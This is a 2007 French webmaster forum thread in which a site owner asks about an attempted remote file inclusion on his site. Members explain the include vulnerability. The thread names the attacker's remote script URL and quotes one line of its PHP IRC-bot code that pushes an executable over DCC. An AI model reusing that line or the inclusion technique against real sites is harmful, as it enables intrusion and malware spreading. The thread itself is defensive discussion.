tentative de hacking sur mon site?

Discussion dans 'Demandes d'avis et de conseils sur vos sites' créé par tontonsumo, 29 Janvier 2007.

  1. tontonsumo
    tontonsumo WRInaute discret
    Inscrit:
    13 Mai 2004
    Messages:
    110
    J'aime reçus:
    0
    Bonjour,

    Apparemment, une personne vient d'essayer une injection dans une de mes url.
    J'airais voulu avoir votre avis, pour savoir si c'est malveillant, car j'ai son IP.

    Voici l'url qu'elle a tenté de mettre dans une variable d'une de mes pages.
    http://oitech69.iquebec.com/socket.txt

    Voici ce que contient ce socket.txt:

    A votre avis, c'était quoi le but?

    merci
     
  2. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 119
    J'aime reçus:
    1
    Le but : heu ... remplir un topic de code imbuvable :roll:
     
  3. Leonick
    Leonick WRInaute accro
    Inscrit:
    8 Août 2004
    Messages:
    19 274
    J'aime reçus:
    0
    de toutes façons, un fichier txt servi en text/plain, ça ne porte pas à conséquence
     
  4. tontonsumo
    tontonsumo WRInaute discret
    Inscrit:
    13 Mai 2004
    Messages:
    110
    J'aime reçus:
    0
    Bonjour Zecat :cry: ,

    Excuse moi...
    Je ne savais pas comment faire...

    by :?
     
  5. tontonsumo
    tontonsumo WRInaute discret
    Inscrit:
    13 Mai 2004
    Messages:
    110
    J'aime reçus:
    0
    Bonjour Léonick...

    Donc y aurait pas eu volonté de nuire...
    Peut-etre une mauvaise manip...

    Quoique.... il y a eu 3 essai, donc le 3ème avec changement d'IP.

    Merci
     
  6. Seraph
    Seraph WRInaute occasionnel
    Inscrit:
    2 Avril 2006
    Messages:
    307
    J'aime reçus:
    0
    Cette ligne ne me parait pas tres "hors de volonté de nuire"... :/

    fputs($ircsock, "PRIVMSG ".$ff[1]." :DCC SEND sucker.exe 3586902543 1024 1064966\r\n");

    On dirait que c'est pour envoyer en DCC Send un fichier exe sur IRC, non ?

    Regarde sur ton serveur si tu n'as pas un .exe (ou autre) qui n'est pas de toi au cas ou...
     
  7. tontonsumo
    tontonsumo WRInaute discret
    Inscrit:
    13 Mai 2004
    Messages:
    110
    J'aime reçus:
    0
    Bonjour Seraph,


    Je viens de vérifier, j'ai rien vu de spécial.
    un fichier . exe peut-il s'exécuter sur un serveur linux? :?


    en tout cas merci
     
  8. Seraph
    Seraph WRInaute occasionnel
    Inscrit:
    2 Avril 2006
    Messages:
    307
    J'aime reçus:
    0
    Dans tous les cas, je ne pense pas que ce soit envers ton serveur que l'attaque (si attaque il y a) se fera, c'est plus le coup de se servir de ton serveur pour envoyer des fichiers par les messages privés d'IRC.

    Mais apres je me trompe peut etre etant donné que je n'ai pas regardé le code en entier. :wink:
     
  9. Leonick
    Leonick WRInaute accro
    Inscrit:
    8 Août 2004
    Messages:
    19 274
    J'aime reçus:
    0
    enfin, tant que cette page sera servie en text/plain, pas de problème.
    Ce qui n'empêche de sécuriser quand même tes scripts :wink:
     
  10. easy_zik
    easy_zik WRInaute occasionnel
    Inscrit:
    7 Juillet 2003
    Messages:
    375
    J'aime reçus:
    0
    totalement faux...

    Ce script essaye de tester une faille de sécurité à l'include.

    Si quelque part dans ton code tu as un " include $page " et que $page et une variable GET, alors tu vas faire un include du code importé via http.

    .. et là, c'est le drame.

    That's all. Après, je sais pas ce que script est sensé faire exactement j'ai pas regardé dans le détail. Mais toujours est il qu'il teste la disponibilité de certaines commandes unix comme wget.
    Et si php à le droit d'executer wget, c'est la porte ouverte à à peut près tout (ou n'importe quoi comme tu veux).
    Avec de la chance tu as échappé à une jolie page d'accueil du style "this site has been hacked by..."
    A moins que le vilain garçon n'ait voulu supprimer tous tes fichiers ainsi que ta base de données...
    Mais ca, tu ne sauras jamais, et en même temps, c'est pas plus mal.. :lol:
     
  11. Leonick
    Leonick WRInaute accro
    Inscrit:
    8 Août 2004
    Messages:
    19 274
    J'aime reçus:
    0
    C'est vrai que je n'avais plus pensé à ça. Mais maintenant, qui ose encore faire des include sans vérifier où se trouve la source et permettre l'exécution de scripts distants ?
    depuis le temps que l'on parle de ce type de failles :roll:
     
Chargement...
Similar Threads - tentative hacking Forum Date
tentative de hacking ou pas ? Administration d'un site Web 10 Janvier 2011
que faire pour se protéger après une tentative de hacking ? Administration d'un site Web 15 Octobre 2006
Tentative de Hacking ou Pas? Administration d'un site Web 12 Septembre 2006
Blocage IP selon tentatives d'URL URL Rewriting et .htaccess 21 Décembre 2016
Conseil pour seconde tentative de sortie de pénalité Référencement Google 19 Juillet 2016
Tentative d'intrusion sous wordpress Administration d'un site Web 27 Octobre 2015
Tentative de hack ? un aide svp ! Administration d'un site Web 5 Juin 2012
Tentative de hack ? un aide svp ! Développement d'un site Web ou d'une appli mobile 5 Juin 2012
Tentative de piratage ^^ Administration d'un site Web 12 Avril 2011
Echec navrant du référencement après plusieurs tentatives d'amélioration Débuter en référencement 19 Janvier 2011
Tentatives d'arnaques Droit du web (juridique, fiscalité...) 11 Octobre 2010
Url ressemblant à une tentative de hack Développement d'un site Web ou d'une appli mobile 21 Septembre 2010
tentative de mise en place d'un systeme Demandes d'avis et de conseils sur vos sites 14 Septembre 2010
Attention tentative de pishing du site ovh Administration d'un site Web 15 Août 2010
tentative de phising sur adwords AdWords 22 Janvier 2010
Tentative d'injection sql de googlebot ? Demandes d'avis et de conseils sur vos sites 14 Décembre 2009
comment interdire les tentatives de piratage et les spam avec .htacces URL Rewriting et .htaccess 14 Décembre 2009
Tentative d'introduction au VSEO Référencement Google 21 Août 2009
Tentative de Hack ! Droit du web (juridique, fiscalité...) 27 Juin 2009
Tentative d'explication de l'effet YOYO de Google Problèmes de référencement spécifiques à vos sites 10 Juin 2009